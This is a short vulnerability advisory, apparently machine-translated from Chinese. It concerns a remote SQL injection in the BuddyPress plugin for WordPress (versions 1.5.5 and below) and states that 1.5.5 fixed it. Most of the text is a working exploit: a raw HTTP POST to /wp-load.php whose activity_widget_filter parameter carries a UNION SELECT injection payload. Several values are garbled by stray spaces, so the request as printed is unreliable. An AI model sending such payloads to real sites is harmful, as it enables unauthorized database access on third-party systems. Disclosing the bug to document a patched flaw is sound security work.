Wordpress plugin Buddypress remote SQL injection and fix-vulnerability warning-the black bar safety net

ID MYHACK58:62201233540
Type myhack58
Reporter 佚名
Modified 2012-04-01T00:00:00


Title: Buddypress plugin of Wordpress remote SQL Injection

Author: Ivan Terkin

Type: Remote Exploit

Vulnerability: Remote SQL Injection

Software download address: buddypress.org

Affects versions: 1.5.5 and below

Test platform: Buddypress 1.5.4

POST /wp-load.php HTTP/1.1

User-Agent: Mozilla

Host: www.xxxx.com

Accept: /

Referer: http://www.badguest.cn /activity/? s=b

Connection: Keep-Alive

Content-Length: 1 5 3

Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(1 0),(1 1),(1 2),(1 3),(1 4),(1 5),(1 6),(1 7))%3b--+

Repair solutions:

Has been reported to the official and in the 1.5.5 version were fixed